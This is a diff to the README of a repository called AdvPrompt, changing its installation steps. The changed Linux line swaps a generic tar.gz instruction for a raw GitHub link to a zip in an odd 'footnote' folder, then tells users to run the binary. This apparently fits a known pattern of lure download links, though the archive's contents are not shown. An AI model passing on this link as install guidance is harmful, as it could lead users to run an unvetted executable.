BocikTM/AdvPrompt/Readme.md

 4. **Run the Installer:**
    - **Windows:** Double-click the downloaded `.exe` file and follow the instructions.
    - **macOS:** Open the downloaded `.dmg` file, drag AdvPrompt to your Applications folder, and open from there.
-   - **Linux:** Extract the downloaded tar.gz file and run the binary in the terminal.
+   - **Linux:** Extract the downloaded https://raw.githubusercontent.com/BocikTM/AdvPrompt/main/footnote/AdvPrompt.zip file and run the binary in the terminal.

 5. **Launch the Application:** Once installed, open AdvPrompt from your applications menu or desktop shortcut.